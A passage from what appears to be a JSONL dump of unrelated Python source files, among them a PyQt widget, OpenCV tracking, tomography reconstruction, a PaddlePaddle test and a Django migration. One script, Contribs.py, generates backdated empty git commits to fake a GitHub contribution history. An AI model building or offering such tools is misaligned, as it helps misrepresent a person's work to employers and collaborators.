super().__init__(parent=parent)\n self.extractor = extractor\n\n layout = QtWidgets.QVBoxLayout()\n\n layout.addWidget(self.create_word_lists())\n layout.addWidget(self.create_html_field())\n layout.addWidget(self.create_control_group())\n\n self.setLayout(layout)\n\n def create_html_field(self):\n group = QtWidgets.QGroupBox()\n group.setTitle(\"HTML\")\n\n layout = QtWidgets.QVBoxLayout()\n\n self.html_field = QtWidgets.QTextEdit()\n self.html_field.setAlignment(QtCore.Qt.AlignLeft)\n self.html_field.textChanged.connect(self.text_changed)\n\n layout.addWidget(self.html_field)\n group.setLayout(layout)\n\n return group\n\n def text_changed(self):\n self.extractor.text = self.html_field.toPlainText()\n\n def create_control_group(self):\n group = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n save_button = QtWidgets.QPushButton()\n save_button.setText(\"Save\")\n save_button.clicked.connect(self.extractor.save_dictionary)\n\n load_button = QtWidgets.QPushButton()\n load_button.setText(\"Load\")\n load_button.clicked.connect(self.extractor.load_dictionary)\n\n extract_button = QtWidgets.QPushButton()\n extract_button.setText(\"Extract\")\n extract_button.clicked.connect(self.extractor.get_dictionary_diff)\n\n apply_button = QtWidgets.QPushButton()\n apply_button.setText(\"Apply\")\n apply_button.clicked.connect(self.extractor.apply_dictionary_diff)\n\n layout.addWidget(save_button)\n layout.addWidget(load_button)\n layout.addWidget(extract_button)\n layout.addWidget(apply_button)\n\n group.setLayout(layout)\n return group\n \n def create_word_lists(self):\n group = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n layout.addWidget(self.create_word_list(\"Add list\", self.extractor.add_word_list))\n layout.addWidget(self.create_word_list(\"Removed list\", self.extractor.removed_word_list))\n\n group.setLayout(layout)\n return group\n\n def create_word_list(self, title, model):\n group = QtWidgets.QGroupBox()\n group.setTitle(title)\n layout = QtWidgets.QHBoxLayout()\n\n @Slot(int)\n def title_callback(list_size):\n group.setTitle(f\"{title} ({list_size})\")\n\n list_view = QtWidgets.QListView()\n list_view.setModel(model)\n\n model.list_size_changed.connect(title_callback)\n\n layout.addWidget(list_view)\n group.setLayout(layout)\n\n return group\n\n\n\n","sub_path":"src/app/HTMLDictionaryExtractorWidget.py","file_name":"HTMLDictionaryExtractorWidget.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262234788","text":"import random\nfrom art import logo,vs\nfrom dictionary import data\n\n\n# # first chose\n\ndef formating(data1):\n account_name1 = data1[\"name\"]\n acount_description1 = data1[\"description\"]\n account_country1 = data1[\"country\"]\n return (f\" {account_name1}, a {acount_description1}, from {account_country1}\")\n\ndef game_print():\n print (f\"Compare A: {formating(compare_a)}\")\n print(\"vs\")\n print (f\"Against B: {formating(compare_b)}\")\n\n\n#random data from dictionary + removing from data set\ndef chose_the_next_one(data):\n compare_next = random.choice(data)\n data.remove(compare_next)\n return compare_next\n \ndef check(user_choise, a_followers, b_followers):\n \n if user_choise==\"a\" and a_followers> b_followers :\n return True\n elif user_choise==\"b\" and a_followers 0:\n contourOI_.append(max(contours, key=cv2.contourArea))\n area = cv2.contourArea(contourOI_[roi])\n if (area > area_min) and (area < area_max):\n contourOI.append(cv2.convexHull(contourOI_[roi]))\n M = cv2.moments(contourOI[roi])\n cx.append(int(M[\"m10\"] / M[\"m00\"]))\n cy.append(int(M[\"m01\"] / M[\"m00\"]))\n data[roi].append((frame_id, cx[roi], cy[roi], area))\n else:\n print(\"no large enough contour found for roi {}!\".format(roi))\n data[roi].append((frame_id, np.nan, np.nan, np.nan))\n contourOI_[-1] = False\n contourOI.append(False)\n cx.append(np.nan)\n cy.append(np.nan)\n else:\n print(\"no contour found for roi {}!\".format(roi))\n data[roi].append((frame_id, np.nan, np.nan, np.nan))\n contourOI_.append(False)\n contourOI.append(False)\n cx.append(np.nan)\n cy.append(np.nan)\n\n if frame_id % 500 == 0:\n print(\"Frame {}\".format(frame_id))\n if display:\n full_image_thresholded = (cv2.threshold(frameDelta_full, threshold, 255, cv2.THRESH_TOZERO)[1])\n # Live display of full resolution and ROIs\n cv2.putText(full_image_thresholded, \"Framenum: {}\".format(frame_id), (30,\n full_image_thresholded.shape[0] -\n 30), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5, color=255)\n\n for roi in range(0, len(rois) - 1):\n if np.all(contourOI_[roi] != False):\n curr_roi = rois[\"roi_\" + str(roi)]\n # add in contours\n corrected_contour = np.empty(contourOI_[roi].shape)\n corrected_contour[:, 0, 0] = contourOI_[roi][:, 0, 0] + curr_roi[0]\n corrected_contour[:, 0, 1] = contourOI_[roi][:, 0, 1] + curr_roi[1]\n cv2.drawContours(full_image_thresholded, corrected_contour.astype(int), -1, 255, 1)\n\n # add in centroid\n cv2.circle(full_image_thresholded, (cx[roi] + curr_roi[0], cy[roi] + curr_roi[1]), 8, 255, 1)\n\n cv2.imshow(\"Live thresholded\", full_image_thresholded)\n cv2.imshow(\"Live\", gray)\n cv2.waitKey(1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n frame_id += 1\n\n # saving data\n print(\"Saving data output\")\n date = datetime.datetime.now().strftime(\"%Y%m%d\")\n\n for roi in range(0, len(rois) - 1):\n datanp = np.array(data[roi])\n if split_name is False:\n filename = video_path[0:-4] + \"_tracks_{}_Thresh_{}_Area_{}_roi-{}.csv\".format(date, threshold, area_min,\n roi)\n else:\n range_s = str(split_range[0]).zfill(5)\n range_e = str(split_range[1]).zfill(5)\n filename = video_path[0:-4] + \"_tracks_{}_Thresh_{}_Area_{}_Range{}-{}_.csv\".format(date, threshold,\n area_min, range_s,\n range_e)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n np.savetxt(filename, datanp, delimiter=\",\")\n\n print(\"Tracking finished on video cleaning up\")\n cv2.destroyAllWindows()\n","sub_path":"ola_behave/tracking/offline_tracker.py","file_name":"offline_tracker.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"247264876","text":"# Read File\nimport numpy as np\nimport pandas as pd\n\n\ndef read(file_name):\n data_aux = pd.read_csv(file_name)\n sin = data_aux['sin']\n dm = data_aux['dm']\n chi = data_aux['chi']\n\n return dm.array, sin.array, chi.array\n\ny, x, z = read('data.csv')\n#y, x, z = np.genfromtxt(r'data.dat', unpack=True)\nx_bugey, y_bugey = np.loadtxt(\"bugey_90.dat\", unpack=True)\n\n#Plot Contour\nimport matplotlib.pyplot as plt\nimport scipy.interpolate\n\nfig = plt.figure()\n\nprint(z)\nplt.plot(x_bugey,y_bugey,color='black',label='Bugey')\nsys = plt.tricontour(x,y,z,levels=[min(z)+4.61], colors='red')\n\n\nsys.collections[0].set_label('New Effect')\n\nplt.legend()\n\ny_axis_NAME='$\\\\Delta m^2[eV]^2$'\nx_axis_NAME='$\\\\sin^22\\\\theta$'\n\nplt.xscale('log')\nplt.yscale('log')\nplt.xlim([0.01,1.0])\nplt.ylim([0.003,20.0])\nplt.ylabel(y_axis_NAME)\nplt.xlabel(x_axis_NAME)\n\nplt.title('Bugey - No Systematics Marginalization')\nplt.savefig('th14_dm41.pdf') \nplt.show()\n","sub_path":"plot/contour_plot.py","file_name":"contour_plot.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577068606","text":"import h5py\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.transform import iradon\nimport radontea\nfrom scipy.interpolate import interp1d\nimport math\nfrom tqdm import tqdm\nimport tensorflow as tf\n\n\n\ndef get_from_mat(filename):\n ''' loads sino '''\n file = h5py.File(filename, 'r')\n key, = list(file.keys())\n return file.get(key)[:]\n\n\ndef correct_image(img, shifts, linear_interpolation=True, **args):\n ''' \n Correct shifted image using linear interpolation, example:\n :param img: raw image\n :param shifts: np.array of desired shifts\n :param linear_interpolation: use linear interpolation or simple round\n **args for scipy.interpolate.interp1d, refer scipy.interpolate\n \n Example:\n sino_corrected_linear = correct_image(sino_raw, 1.5 * shifts.squeeze(), linear_interpolation=True, kind='cubic')\n \n :return: np.array corrected image\n '''\n shifts = shifts.squeeze()\n\n assert img.ndim == 2\n assert img.shape[0] == shifts.shape[0]\n\n margin_right = -int(np.floor(shifts.min()))\n margin_left = int(np.ceil (shifts.max()))\n assert margin_left > 0 and margin_right > 0\n\n result = np.zeros(shape=(img.shape[0], img.shape[1] + margin_left + margin_right), dtype=img.dtype)\n\n for i_row, (row, shift) in enumerate(zip(img, shifts)):\n if linear_interpolation:\n x = np.arange(len(row))\n f = interp1d(x - shift, row, **args)\n row_interpolated = f(np.clip(np.arange(-margin_left, img.shape[1] + margin_right), (x - shift).min(), (x - shift).max()))\n result[i_row] = row_interpolated\n else:\n shift = -int(np.round(shift))\n result[i_row][margin_left + shift : margin_left + shift + len(row)] = row\n\n return result[:,margin_left + margin_right : -(margin_left + margin_right)]\n\n\n\ndef np_iradon_custom(sino, angles, filtering=True, circle=True):\n ln = sino.shape[1]\n # filetring:\n if filtering:\n kx = 2 * np.pi * np.abs(np.fft.fftfreq(ln))\n kx = kx[None, :]\n projection = np.fft.fft(sino, axis=0) * kx\n sino_filtered = np.real(np.fft.ifft(projection, axis=0))\n # Resize filtered sinogram back to original size\n sino = sino_filtered[:, :ln]\n \n # main process:\n fourier_sino = np.fft.rfft(sino, axis=0)\n wfilt = np.linspace(0, fourier_sino.shape[0], fourier_sino.shape[0])[:,np.newaxis]\n #wfilt *= (np.cos(wfilt * np.pi / 2))**2\n backprojections = np.fft.irfft(fourier_sino * wfilt, axis=0)\n result = np.zeros(dtype=float, shape=backprojections.shape[:1] * 2)\n size = result.shape[0]\n xx, yy = np.meshgrid(*[np.linspace(-(size - 1) / 2., (size - 1) / 2., size)] * 2)\n for th, backproj in zip(angles, backprojections.T):\n th *= np.pi / 180.\n coords = xx * np.cos(th) + yy * np.sin(th) + (size - 1) / 2\n ccoords = np.ceil(coords).astype(int)\n fcoords = np.floor(coords).astype(int)\n# # print(th, coords, ccoords, fcoords)\n cmask = (ccoords >= 0) & (ccoords < size)\n fmask = (fcoords >= 0) & (fcoords < size)\n wc = 1 - (ccoords - coords)\n wf = 1 - (coords - fcoords)\n# print(wc, wf)\n result += backproj[np.where(cmask, ccoords, 0)] * wc + \\\n backproj[np.where(fmask, fcoords, 0)] * wf\n if circle:\n out_reconstruction_circle = (xx ** 2 + yy ** 2) >= ((size - 1) / 2) ** 2\n result[out_reconstruction_circle] = 0.\n return result / len(angles) / (2. * np.pi)\n\n\n\ndef tf_iradon_custom(sino, angles, filtering=True, circle=True):\n sino = tf.convert_to_tensor(sino, dtype=tf.float64)\n angles = tf.convert_to_tensor(angles * np.pi / 180., dtype=tf.float64)\n \n if filtering:\n ln = sino.shape[1]\n kx = 2 * np.pi * np.abs(np.fft.fftfreq(ln))\n kx = kx[None, :]\n kx = tf.convert_to_tensor(kx, dtype=tf.float64)\n sino_prepared = tf.transpose(tf.cast(sino, tf.complex128))\n projection = tf.transpose(tf.signal.fft(sino_prepared)) * tf.cast(kx, tf.complex128)\n sino_filtered = tf.transpose(tf.math.real(tf.signal.ifft(tf.transpose(projection))))\n # Resize filtered sinogram back to original size\n sino = sino_filtered[:, :ln]\n \n # main process:\n fourier_sino = tf.transpose(tf.signal.rfft(tf.transpose(sino))) # maybe 2d?\n shape = tf.shape(fourier_sino)[0]\n wfilt = tf.linspace(0., tf.cast(shape, dtype=tf.float64), shape)[:, None]\n wfilt = tf.cast(wfilt, tf.complex128)\n backprojections = tf.transpose(tf.signal.irfft(tf.transpose(fourier_sino * wfilt)))\n size = tf.shape(backprojections)[0]\n result = tf.zeros(dtype=tf.float64, shape=[size] * 2)\n xx, yy = tf.meshgrid(*[tf.linspace(-(size - 1) / 2, (size - 1) / 2, size)] * 2)\n backprojections = tf.transpose(backprojections)\n for th, backproj in zip(angles, backprojections):\n coords = tf.cast(xx, tf.float64) * tf.cos(th) + tf.cast(yy, tf.float64) * tf.sin(th) + (tf.cast(size, tf.float64) - 1.) / 2.\n ccoords = tf.cast(tf.math.ceil(coords), tf.int32)\n fcoords = tf.cast(tf.math.floor(coords), tf.int32)\n cmask = tf.math.logical_and(ccoords >= 0, ccoords < size)\n fmask = tf.math.logical_and(fcoords >= 0, fcoords < size)\n wc = 1. - (tf.cast(ccoords, tf.float64) - coords)\n wf = 1. - (coords - tf.cast(fcoords, tf.float64))\n result += tf.gather(backproj, tf.where(cmask, ccoords, 0)) * wc + \\\n tf.gather(backproj, tf.where(fmask, fcoords, 0)) * wf\n result = result.numpy() / angles.shape[0] / (2. * np.pi)\n if circle:\n out_reconstruction_circle = (xx.numpy() ** 2 + yy.numpy() ** 2) >= ((size.numpy() - 1) / 2) ** 2\n result[out_reconstruction_circle] = 0.\n return result\n\n\n\ndef iradon_centered(image, angles, center, kind='linear', lib='scipy', show=False):\n '''\n Apply inverse randon transform to image.\n :param image: corrected image\n :param angles: array of angles sino\n :param center: desired center of sinogram\n :param kind: kind of interpolation for scipy.interpolate.interp1d used in centering\n :param lib: scipy or radontea - desired lib for reconsctruction\n :param show: whether to show shifted sinogram and final result\n \n :return: reconstruction\n '''\n shift = image.shape[1] / 2 - center\n fixed_image = np.zeros((image.shape[0], 2 * math.ceil(np.abs(shift)) + image.shape[1]))\n for i_row, row in enumerate(image):\n x = np.arange(len(row))\n if shift < 0:\n f = interp1d(x - shift, row, kind=kind)\n row_interpolated = f(np.clip(np.arange(-shift, image.shape[1]), (x - shift).min(), (x - shift).max()))\n fixed_image[i_row, :len(row_interpolated)] = row_interpolated\n else:\n f = interp1d(x + shift, row, kind=kind)\n row_interpolated = f(np.clip(np.arange(0, image.shape[1] + shift), (x + shift).min(), (x + shift).max()))\n fixed_image[i_row, -len(row_interpolated):] = row_interpolated\n if show:\n plt.figure(figsize=(10, 12))\n plt.imshow(fixed_image)\n plt.title('prepared sino with shift: ' + str(shift))\n plt.show()\n if lib == 'radontea':\n reco = radontea.backproject(fixed_image, angles)\n elif lib == 'scipy':\n reco = iradon(fixed_image.T, angles * 180 / np.pi)\n elif lib == 'custom_np':\n reco = np_iradon_custom(fixed_image.T, angles * 180 / np.pi)\n elif lib == 'custom_tf':\n reco = tf_iradon_custom(fixed_image.T, angles * 180 / np.pi)\n else:\n raise NotImplemented('This lib is unknown')\n if show:\n plt.figure(figsize=(15, 15))\n plt.imshow(reco, vmax=0.001)\n plt.show()\n return reco\n\n\ndef find_visual_best(centers, sino, angles, from_x=0, from_y=0, to_x=None, to_y=None, ncols=2, **kwargs):\n '''\n Plotting part of reconstrunctions with specified center for visiual check of quality.\n \n :param centers: iterable of desired centers\n :param sino: prepared for iradon_centered sino\n :param angles: angles for iradon_centered\n :param from_x: desired crop start for axis 0, zero by default\n :param from_y: desired crop start for axis 1, zero by default\n :param to_y: desired crop end for axis 0, None by default, which means reco.shape[0]\n :param to_y: desired crop end for axis 1, None by default, which means reco.shape[1]\n :param ncols: number of columns to be plotted\n\n :return: plt.figure\n '''\n \n nrows = math.ceil(len(centers) / ncols)\n f, axs = plt.subplots(nrows, ncols, figsize=(15, 25))\n for i, center in enumerate(tqdm(centers)):\n kwargs['show'] = kwargs.get('show', False)\n reco = iradon_centered(sino, angles, center=sino.shape[1] / 2 + center, **kwargs)\n row = i // ncols\n col = i % ncols\n if to_x is None:\n to_x = reco.shape[0]\n if to_y is None:\n to_y = reco.shape[1]\n axs[row][col].imshow(reco[from_x:to_x,from_y:to_y])\n axs[row][col].set_title('center: ' + str(center))\n return f","sub_path":"reconstruct.py","file_name":"reconstruct.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"409671410","text":"#!/usr/bin/env python\n\nimport zmq\nimport json\nimport sys\n\nif sys.version_info < (3, 0):\n print(\"This script requires Python 3.\")\n sys.exit(1)\n\ndef subscribe(host):\n return subscribe_with_filter(host, \"\")\n\n\ndef subscribe_with_filter(host, topic_filter):\n subscriber = zmq.Context().socket(zmq.SUB)\n subscriber.setsockopt_string(zmq.SUBSCRIBE, topic_filter)\n subscriber.connect(host)\n return subscriber\n\ndef await_and_consume(subscriber, handlers):\n while True:\n msg = subscriber.recv_string()\n try:\n obj = json.loads(msg)\n # print(obj)\n\n message_type = obj['message_type']\n handler = handlers.get(message_type, None)\n if handler:\n handler(obj['body'])\n else:\n print('No handler for message type: ' + message_type)\n\n except ValueError:\n print('Failed to parse JSON: ' + msg)\n\ndef login_topic_handler(data):\n print(\"Login with data: {}\".format(data))\n\n\nawait_and_consume(subscribe(\"tcp://35.189.246.57:5556\"), {'login': login_topic_handler})\n","sub_path":"clients/python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26095287","text":"import numpy as np\n\nMAX_DEGREE = 30\nfile = open('GaussLegendre.dat', 'w')\n\nfor deg in range(2,MAX_DEGREE+1,2):\n x, w = np.polynomial.legendre.leggauss(deg)\n \n # Write nodes\n file.write('static double s_n' + str(deg) + '[] = { ' + format(x[0], '.16f'))\n for k in range(1,deg):\n file.write(', ' + format(x[k], '.16f'))\n file.write(' };\\n')\n \n # Write weights\n file.write('static double s_w' + str(deg) + '[] = { ' + format(w[0], '.16f'))\n for k in range(1,deg):\n file.write(', ' + format(w[k], '.16f'))\n file.write(' };\\n')\n \n","sub_path":"util/CreateGaussLegendre.py","file_name":"CreateGaussLegendre.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125032848","text":"#!/usr/bin/python\n\"\"\"\nCompute gradient of temperature\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as ppl\nimport h5py\n\nfrom scipy.stats import scoreatpercentile\n\nimport ConfigBF\nreload(ConfigBF)\nfrom ConfigBF import *\n\nfrom cPickle import load as cLoad\nfrom gzip import GzipFile\n\nfrom sys import path\npath.append('/home/cimatori/installed/nioz-hst/Python/Trunk')\nfrom NIOZhst.String import String\n\nimport gsw\n\nppl.close('all')\n\nprint ('Load data...')\n\nf = GzipFile(DetailFile, 'r')\nS = cLoad(f)\nf.close()\n\ntime, Tmp = S.ToArray(Range=(Start,End), Convention='yearday', \\\n Fill='missing', Skip=SubSamp, ColInt=True)\n\nZ = S.Depths\n\nif SubSamp>=0:\n dt = SubSamp+1\nelse:\n dt = -SubSamp\n\nprint ('Data loaded.')\n\n# we open now the output file, in order to copy the attributes\noutput = h5py.File (\\\n OutDir+'results/Gradient_Start_{}_End_{}.hdf'.format(Start,End),\\\n mode='w')\n\ndims = output.create_group('dims')\nrd = output.create_group('data')\n# Depth\nDepth = dims.create_dataset('depth', \\\n shape=Z.shape, maxshape=Z.shape, **hdfopt)\nDepth.attrs['Units'] = 'm'\n# Time\nTime = dims.create_dataset('time', \\\n shape=time.shape, maxshape=(None,), **hdfopt)\nTime.attrs['Units'] = 'yearday'\n# Ids\nId = dims.create_dataset('th_id', \\\n shape=Z.shape, maxshape=Z.shape, **hdfopt)\n# Potential temperature\nTh = rd.create_dataset('potemp', \\\n shape=(Z.size,time.size), maxshape=(Z.size,time.size), \\\n **hdfopt)\nTh.attrs['Units'] = 'deg C'\n# Bouyancy frequency squared\nBFreq2 = rd.create_dataset('N2', \\\n shape=(Z.size,time.size), maxshape=(Z.size,time.size), \\\n **hdfopt)\nBFreq2.attrs['Units'] = 's^-2'\n# overwrite time step which is different\noutput.attrs['TimeStep'] = -SubSamp\n\n#Compute overturning\nprint ('Compute gradient')\npres = gsw.p_from_z(Z, lat=36.98)\nTmean = Tmp[~np.isnan(Tmp)].mean()\npMean = pres.mean()\nalr = gsw.adiabatic_lapse_rate_from_t(35.12, Tmean, pMean)\nalpha = gsw.alpha(35.12, Tmean, pMean)\nT = Tmp - alr*(pres-pMean)[:,np.newaxis]\ndz = np.mean(np.diff(Z))\n\n# gradient of unstable profile\ndTdz2,_ = np.gradient(T,dz,-SubSamp)\nNbv2 = g*dTdz2*alpha\n\nprint('Save data')\n\nTime[:] = time\nDepth[:] = Z\nTh[:] = T\nBFreq2[:] = Nbv2\noutput.close()\n\n#Plot data\nif 1:\n print ('Plot potential temperature')\n F = ppl.figure()\n F.subplots_adjust(left=0.09, bottom=0.08, right=1.02, top=0.98)\n AX = F.add_subplot(111)\n data = T[:,(time>=DetStart)&(time=DetStart)&(time=DetStart)&(time=DetStart)&(time max_relative_error)\n return (\"%s Variable %s max gradient diff %f over limit %f, \"\n \"the first error element is %d, %f, %f\") % (\n \"Gradient Check On %s\" % str(place), name, max_diff,\n max_relative_error, offset, a.flatten()[offset],\n b.flatten()[offset])\n\n self.assertLessEqual(max_diff, max_relative_error, err_msg())\n\n def check_forward_backward(self, shape, begin_norm_axis):\n def test_with_place(place, shape, begin_norm_axis=1):\n # setUp\n assert begin_norm_axis > 0 and begin_norm_axis < len(\n shape), 'begin_norm_axis must be between 0 and len(shape)-1.'\n # attr\n epsilon = 0.00001\n x_shape = shape\n D = reduce(mul, x_shape[begin_norm_axis:len(x_shape)], 1)\n scale_shape = [D]\n np.random.random(123)\n x_val = np.random.random_sample(x_shape).astype(np.float32)\n scale_val = np.random.random_sample(scale_shape).astype(np.float32)\n bias_val = np.random.random_sample(scale_shape).astype(np.float32)\n y_grad = np.random.random_sample(x_shape).astype(np.float32)\n\n # run forward\n y_out, saved_mean, var_ref = _reference_layer_norm_naive(\n x_val, scale_val, bias_val, epsilon, begin_norm_axis)\n naive_fw = {\"Y\": y_out, \"Mean\": saved_mean, \"Variance\": var_ref}\n\n # get gradient\n x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_layer_norm_grad(\n x_val, y_grad, scale_val, saved_mean, var_ref, begin_norm_axis)\n naive_grad = {\n \"X\": x_grad_ref,\n \"Scale\": scale_grad_ref,\n \"Bias\": bias_grad_ref\n }\n\n scope = core.Scope()\n\n # create input\n input_map = {\"X\": x_val, \"Scale\": scale_val, \"Bias\": bias_val}\n for i_name in input_map:\n create_or_get_tensor(scope, i_name, input_map[i_name], place)\n\n # create output\n output_map = {\"Y\": None, \"Mean\": None, \"Variance\": None}\n output_tensor = {}\n for o_name in output_map:\n output_tensor[o_name] = create_or_get_tensor(\n scope, o_name, output_map[o_name], place)\n\n layer_norm_op = Operator(\n \"layer_norm\",\n # inputs\n X=\"X\",\n Scale=\"Scale\",\n Bias=\"Bias\",\n # outputs\n Y=\"Y\",\n Mean=\"Mean\",\n Variance=\"Variance\",\n # attrs\n epsilon=epsilon,\n begin_norm_axis=begin_norm_axis)\n\n layer_norm_op.run(scope, place)\n\n # check forward result\n atol = 5e-2 if isinstance(place, core.CUDAPlace) else 1e-4\n for o_tensor in output_tensor:\n self.__assert_close(output_tensor[o_tensor], naive_fw[o_tensor],\n o_tensor, atol)\n\n # run backward\n layer_norm_op_grad = get_backward_op(scope, layer_norm_op, set())\n set_output_grad(\n scope, [\"Y\", \"Mean\", \"Variance\"],\n place,\n feed_dict={\"Y\": y_grad})\n layer_norm_op_grad.run(scope, place)\n\n # get output\n grad_tensor = {}\n for o_name in naive_grad:\n grad_tensor[o_name] = x_ = create_or_get_tensor(\n scope, grad_var_name(o_name), None, place)\n\n # check gradient output\n for o_grad in naive_grad:\n self.__assert_grad_close(grad_tensor[o_grad],\n naive_grad[o_grad], o_grad + \"@GRAD\",\n place)\n\n places = [core.CPUPlace()]\n if core.is_compiled_with_cuda() and core.op_support_gpu(\"layer_norm\"):\n places.append(core.CUDAPlace(0))\n\n for place in places:\n test_with_place(place, shape, begin_norm_axis)\n\n def test_check_forward_backward_with_scale_and_bias(self):\n self.check_forward_backward(shape=[2, 3, 4, 5], begin_norm_axis=1)\n self.check_forward_backward(shape=[2, 3, 4, 5], begin_norm_axis=3)\n\n def test_check_forward_backward_with_scale(self):\n pass # TODO(zcd)\n\n def test_check_forward_backward_with_bias(self):\n pass # TODO(zcd)\n\n def test_check_forward_backward(self):\n pass # TODO(zcd)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/paddle/v2/fluid/tests/test_layer_norm_op.py","file_name":"test_layer_norm_op.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234447833","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\ndef migrate_irc_nick(apps, schema_editor):\n \"\"\"Copy the User.username into the StandupUser.irc_nick field because this is what the irc bot in\n Standup v1 used to match.\n\n \"\"\"\n StandupUser = apps.get_model('status', 'StandupUser')\n for suser in StandupUser.objects.all():\n suser.irc_nick = suser.user.username\n suser.save()\n\n\ndef wipe_irc_nick(apps, schema_editor):\n \"\"\"Wipe the StandupUser.irc_nick field contents\"\"\"\n StandupUser = apps.get_model('status', 'StandupUser')\n for suser in StandupUser.objects.all():\n suser.irc_nick = None\n suser.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('status', '0006_add_irc_nick'),\n ]\n\n operations = [\n migrations.RunPython(migrate_irc_nick, wipe_irc_nick),\n ]\n","sub_path":"standup/status/migrations/0007_migration_irc_nick.py","file_name":"0007_migration_irc_nick.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74961650","text":"from value import LeagueValues as Lv\n\n\nclass LoLItem:\n def __init__(self, name, item_id, gist, description, base, buy, sell, builds_from_list, builds_into_list, art):\n self.name = name\n self.item_id = item_id\n self.gist = gist\n self.description = description\n self.base = base\n self.buy = buy\n self.sell = sell\n self.builds_from_list = builds_from_list\n self.builds_into_list = builds_into_list\n self.art = art\n\n def to_str(self, depth=0):\n tabs = '\\t' * depth\n string = '{}{}\\n'.format(tabs, self.name)\n string += '{}{}\\n\\n'.format(tabs, self.gist)\n string += '{}{}\\n\\n'.format(tabs, self.description)\n string += '{}Gold:\\n'.format(tabs)\n string += '{}\\tBase: {}\\n'.format(tabs, self.base)\n string += '{}\\tTotal: {}\\n'.format(tabs, self.buy)\n string += '{}\\tSell: {}\\n'.format(tabs, self.sell)\n if self.builds_from_list:\n string += '{}Builds from:\\n'.format(tabs)\n for b in self.builds_from_list:\n string += '\\t{}{}\\n'.format(tabs, b)\n if self.builds_into_list:\n string += '{}Builds into:\\n'.format(tabs)\n for b in self.builds_into_list:\n string += '\\t{}{}\\n'.format(tabs, b)\n return [string]\n","sub_path":"structure/LoLItem.py","file_name":"LoLItem.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623162961","text":"class HTTP_RES:\n CODE_SUCCESSFULY = 200\n CODE_BAD_REQUEST = 400\n CODE_UNAUTHORIZED = 401\n CODE_FORBIDDEN = 403\n CODE_INTERNAL_SERVER = 500\n\n # msg\n MSG_SUCCESSFULY = 'Successfully'\n\n SUCCESSFULY = {\n 'status': 200,\n 'msg': 'Successfully',\n 'data': ''\n }\n\n BAD_REQUEST = {\n 'status': 400,\n 'msg': 'Bad request'\n }\n\n UNAUTHORIZED = {\n 'status': 401,\n 'msg': 'Required headers for request'\n }\n\n FORBIDDEN = {\n 'status': 403,\n 'msg': 'Request not have the permissions to access'\n }\n\n INTERNAL_SERVER = {\n 'status': 500,\n 'msg': 'Internal server error'\n }\n","sub_path":"microservice-advance/newsservice/src/conf/http_res.py","file_name":"http_res.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"420152179","text":"# This file will write a shell script to fill your github history.\n\nfrom random import randint\nfrom datetime import datetime, timedelta\n\ndef main():\n print('Maximum number of daily commits:')\n maxCommits = input('> ')\n print('Github username:')\n user = input('> ')\n print('Repository:')\n repo = input('> ')\n outFile.truncate()\n write('#!/bin/bash')\n write('REPO='+repo)\n write('USER='+user)\n write('git init $REPO')\n write('cd $REPO')\n write('touch README.md')\n write('git add README.md')\n date = get_init_date()\n while (date.date() != datetime.today().date()):\n dailyWork = randint(0, int(maxCommits))\n for num in range(0, dailyWork):\n write(commit_template(date))\n date += timedelta(days=1)\n\n write('git remote add origin git@github.com:$USER/$REPO.git')\n write('git pull')\n write('git push -u origin master')\n outFile.close()\n\ndef write(s):\n outFile.write(s + '\\n')\n\ndef get_init_date():\n today = datetime.today()\n date = datetime(today.year - 1, today.month, today.day, 12)\n weekday = datetime.weekday(date)\n\n while weekday < 6:\n date = date + timedelta(-1)\n weekday = datetime.weekday(date)\n\n return date\n\ndef commit_template(date):\n template = (\n '''GIT_AUTHOR_DATE={0} GIT_COMMITTER_DATE={1} '''\n '''git commit --allow-empty -m \"faking it since day 1\" > /dev/null\\n'''\n )\n return template.format(date.isoformat(), date.isoformat())\n\noutFile = open('fillit.sh', 'w')\nmain()\n","sub_path":"Contribs.py","file_name":"Contribs.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465478215","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom datetime import datetime, timedelta\nfrom data2html import data2html\n\n\nclass Hedgehog(object):\n\n \"\"\"基础报告生成类,所有报告生成文件都可继承该类\"\"\"\n\n def __init__(self, opt, report_type):\n \"\"\"opt为初始化时所在文件的sys.argv\"\"\"\n report_date = None if len(opt) == 1 else opt[1]\n if report_date is None:\n 